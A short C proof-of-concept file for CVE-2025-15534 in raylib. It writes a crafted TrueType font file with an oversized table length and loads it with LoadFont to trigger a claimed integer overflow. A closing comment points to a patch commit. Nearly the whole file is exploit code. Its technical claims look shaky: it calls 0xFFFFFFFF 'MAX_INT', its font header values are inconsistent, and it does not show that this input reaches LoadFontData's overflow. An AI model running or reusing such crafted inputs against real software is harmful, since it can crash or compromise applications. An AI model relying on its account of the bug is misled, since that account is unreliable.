// CVE-2025-15534 PoC - Integer Overflow in raylib LoadFontData
// This PoC demonstrates the integer overflow vulnerability
#include "raylib.h"
#include <stdio.h>
// Function to create a malicious font file that triggers integer overflow
// The font file contains crafted values that cause overflow in LoadFontData
void create_malicious_font(const char* filename) {
FILE* fp = fopen(filename, "wb");
if (!fp) return;
// TTF font header with crafted values
unsigned char header[] = {
0x00, 0x01, 0x00, 0x00, // sfnt version
0x00, 0x01, // numTables
0x00, 0x10, // searchRange
0x00, 0x00, // entrySelector
0x00, 0x00, // rangeShift
};
// Write malicious header
fwrite(header, 1, sizeof(header), fp);
// Crafted table directory with overflow-inducing values
unsigned char table_dir[] = {
0x00, 0x00, 0x00, 0x00, // tag
0x00, 0x00, 0x00, 0x00, // checksum
0x00, 0x00, 0x00, 0x00, // offset
// Crafted length that causes integer overflow
0xFF, 0xFF, 0xFF, 0xFF, // length (MAX_INT)
};
fwrite(table_dir, 1, sizeof(table_dir), fp);
fclose(fp);
}
int main() {
const int screenWidth = 800;
const int screenHeight = 450;
InitWindow(screenWidth, screenHeight, "CVE-2025-15534 PoC");
SetTargetFPS(60);
// Create malicious font file
const char* malicious_font = "malicious_font.ttf";
create_malicious_font(malicious_font);
// This call triggers the vulnerability
// LoadFontData will process the crafted font file
// and suffer from integer overflow when calculating buffer sizes
Font font = LoadFont(malicious_font);
while (!WindowShouldClose()) {
BeginDrawing();
ClearBackground(RAYWHITE);
DrawText("CVE-2025-15534 Integer Overflow PoC", 10, 10, 20, RED);
DrawText("Vulnerable: raylib LoadFontData function", 10, 40, 20, DARKGRAY);
EndDrawing();
}
UnloadFont(font);
CloseWindow();
return 0;
}
// Mitigation: Apply patch from commit 5a3391fdce046bc5473e52afbd835dd2dc127146
// or upgrade to patched version of raylib